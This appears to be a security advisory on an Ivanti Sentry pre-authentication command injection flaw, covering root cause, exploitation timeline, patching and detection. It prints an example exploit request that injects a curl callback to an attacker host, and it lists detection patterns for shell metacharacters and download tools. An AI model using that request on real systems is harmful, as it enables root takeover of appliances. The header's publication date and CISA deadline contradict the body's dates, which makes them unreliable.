CVE-2026-10520 Critical Patch Available

CVE-2026-10520: Ivanti Sentry — Pre-Authentication OS Command Injection (CVSS 10.0)

Vuln Brief Research Team · · CVSS 10

CVE Details

CVE ID CVE-2026-10520
CVSS Score 10
Severity Critical
Vendor Ivanti
Product Sentry (formerly MobileIron Sentry)
Patch Status Available
Published June 12, 2026
EPSS Score 47.9%
CISA Patch Deadline July 3, 2026

Background

Ivanti Sentry — sold as MobileIron Sentry before the 2020 rebranding — is an enterprise mobile device management (MDM) gateway. It acts as the authentication and proxy layer between mobile devices and internal corporate resources: Exchange email, SharePoint, internal web applications, and EAS endpoints. Large organisations deploy it as the primary access control point for their entire mobile device fleet. This attack surface is why Ivanti products are a persistent target for threat actors: a compromised Sentry appliance gives attackers a position inside the enterprise perimeter, authenticated as the MDM gateway to internal systems.

CVE-2026-10520 is a pre-authentication OS command injection vulnerability in the Sentry management interface (MICS — Mobility Infrastructure Configuration Service). It received a CVSS score of 10.0, the framework’s maximum, reflecting zero-privilege requirements, no user interaction needed, and a direct path to root-level command execution on the appliance.

Ivanti published its advisory on 9 June 2026. WatchTowr published a full technical analysis and proof-of-concept exploit the following day. By 11 June, the Shadowserver Foundation had confirmed active exploitation in the wild, with at least two of nineteen scanned vulnerable instances already backdoored. CISA added CVE-2026-10520 to the Known Exploited Vulnerabilities catalog on 11 June with a patch deadline of 14 June 2026 — an unusually short three-day window reflecting the severity of active exploitation.

A second vulnerability was patched in the same advisory: CVE-2026-10523, an authentication bypass allowing unauthenticated creation of arbitrary administrative accounts (CVSS 9.9). Both are addressed by the same patch releases. This analysis focuses on CVE-2026-10520.

Affected Versions

ProductVulnerable VersionFixed Version
Ivanti Sentry10.5.1 and prior10.5.2
Ivanti Sentry10.6.1 and prior10.6.2
Ivanti Sentry10.7.010.7.1

There is no documented vulnerable version below 10.x in Ivanti’s advisory. Organisations running older Sentry versions (9.x or earlier) that are already beyond vendor support should treat those as vulnerable until confirmed otherwise.

Vulnerability Details

Affected component: ConfigServiceController class within mics.war, the management web application deployed on Sentry appliances.

Vulnerable endpoint: POST /mics/api/v2/sentry/mics-config/handleMessage

Root cause: The handleMessage() method accepts a user-supplied message parameter via an unauthenticated HTTP POST request. The application passes this parameter directly to a command processing routine without sanitising shell metacharacters or validating allowed command types. This is a textbook CWE-78 (OS Command Injection) flaw: user-controlled data reaches an OS command execution context without escaping.

Exploitation mechanics:

An attacker sends an HTTP POST request to the MICS management interface containing an XML payload in the message parameter with embedded command injection:

POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: sentry.example.com
Content-Type: application/x-www-form-urlencoded

message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>id; curl http://attacker.example.com/beacon</reqandres></commandexec>

The MICS service processes this request without authentication before validating the command structure. The injected shell commands execute with the privileges of the MICS service process — root on Ivanti Sentry appliances.

Exposure conditions: Ivanti’s advisory notes that exploitation requires the Sentry appliance to be in an “unmanaged state” with its MICS endpoints externally reachable. Deployments using mutual TLS (mTLS) with EPMM or restricting HTTPS access through Neurons for MDM render the MICS interface inaccessible to external actors. However, assessments of real-world deployment configurations suggest a significant proportion of Sentry appliances expose the MICS interface to broader network ranges than strictly necessary — including, in some cases, directly to the internet.

Exploitation in the Wild

WatchTowr’s analysis, published 10 June 2026, included a working Python-based proof-of-concept and demonstrated the vulnerability’s trivial exploitation characteristics. The PoC is publicly available on GitHub at watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.

The timeline from advisory to confirmed backdooring was exceptionally short:

DateEvent
9 June 2026Ivanti advisory published; no exploitation confirmed at time of disclosure
10 June 2026WatchTowr publishes technical analysis and working PoC exploit
11 June 2026Shadowserver Foundation reports active exploitation; at least 2 of 19 scanned vulnerable instances confirmed backdoored
11 June 2026CISA adds CVE-2026-10520 to KEV catalog; patch deadline set for 14 June 2026

Shadowserver’s confirmation that production instances were already backdoored — not merely scanned or probed — indicates the PoC was weaponised and deployed against real targets within approximately 24 hours of publication. The nature of the backdoors installed was not disclosed in public reporting at time of writing.

Ivanti products have a documented history of rapid weaponisation following disclosure. CVE-2023-46805 and CVE-2024-21887 (Ivanti Connect Secure) saw nation-state exploitation confirmed within days of PoC publication; CVE-2024-21887 was later attributed to UNC5221 (China-nexus). No specific threat actor has been publicly attributed to CVE-2026-10520 exploitation as of this analysis.

Target context: Organisations with externally-accessible Sentry MICS interfaces are at highest risk. Internet-facing MDM gateway infrastructure is the attack profile most consistent with the exploitation confirmation from Shadowserver’s internet-wide scanning.

Patch and Remediation

Primary remediation: Upgrade to Ivanti Sentry 10.5.2, 10.6.2, or 10.7.1 as appropriate for your installed version. Download links are available from Ivanti’s support portal (hub.ivanti.com). CISA’s BOD 26-04 deadline for federal agencies is 14 June 2026; given confirmed active exploitation, treat this as an emergency upgrade outside normal patching cycles for all organisations.

Network-level mitigations (defence-in-depth, not a substitute for patching):

  1. Restrict MICS interface access: The MICS management interface should not be exposed to the internet. If it is currently reachable externally, immediately restrict access to known management IP ranges.
# Verify which interfaces the MICS service is listening on
ss -tlnp | grep 8443
# or (older appliances)
netstat -tlnp | grep 8443

# Review firewall rules to confirm internet access to MICS is blocked
iptables -L INPUT -n -v | grep 8443

  1. Enable mTLS with EPMM: If your deployment uses EPMM integration, enabling mTLS hardens the MICS interface against unauthenticated external access. This is consistent with Ivanti’s mitigation note in the advisory.

  2. WAF rules (interim only): Block POST requests to /mics/api/v2/sentry/mics-config/handleMessage from untrusted source addresses while the upgrade is prepared. WAF controls are insufficient as a standalone mitigation given the simplicity of the exploit.

Post-patch verification: After applying the patch, confirm the upgraded version number in the Sentry admin UI (System > About) and re-scan with a vulnerability scanner to verify resolution.

Detection

Web application logs — exploit attempts:

Monitor Sentry MICS web server logs for POST requests to /mics/api/v2/sentry/mics-config/handleMessage. Any unauthenticated POST to this endpoint from an external source is anomalous and warrants investigation. Look specifically for payloads containing:

  • XML <commandexec> tag sequences
  • Shell metacharacters (; | && || $()) within the message parameter
  • Download utility references (curl, wget) suggesting callback or dropper delivery

System-level indicators of compromise:

  • Unexpected processes spawned by the MICS service (Java/Tomcat parent, sh or /bin/bash child)
  • New user accounts on the appliance (/etc/passwd changes, lastlog anomalies)
  • Modified cron jobs or startup scripts (/etc/cron*, /etc/rc.local, /etc/init.d/)
  • Unusual outbound network connections from the appliance to external IP addresses
  • New files in web-accessible directories (web shells, droppers)
  • Evidence of persistence tooling: rootkits, modified binaries (compare against known-good hashes from clean installation)

Shadowserver scanning exposure check:

Verify whether your Sentry MICS interface is exposed to the internet using external scanning (Shodan, Censys, or Shadowserver’s exposure notification service). If your appliance appears in results, treat it as potentially compromised and conduct forensic review before or alongside patching.

Log aggregation query (SIEM):

source="sentry_mics_access_log" method="POST" path="/mics/api/v2/sentry/mics-config/handleMessage"
| where src_ip NOT IN (known_management_ip_ranges)
| stats count by src_ip, user_agent, _time

References

Tags

ivantisentrymobileironcommand-injectionrcepre-authenticationunauthenticatedmdmcisa-kevcvss-10

Related Analysis

CVE-2026-35273 Critical

CVE-2026-35273: Oracle PeopleSoft PeopleTools — Missing Authentication Enabling Unauthenticated Takeover

Oracle

CVE-2026-11645 High

CVE-2026-11645: Google Chromium V8 Out-of-Bounds Read/Write — Actively Exploited Browser RCE

Google

CVE-2026-20245 High

CVE-2026-20245: Cisco Catalyst SD-WAN Manager CLI Command Injection — Unpatched Root Privilege Escalation

Cisco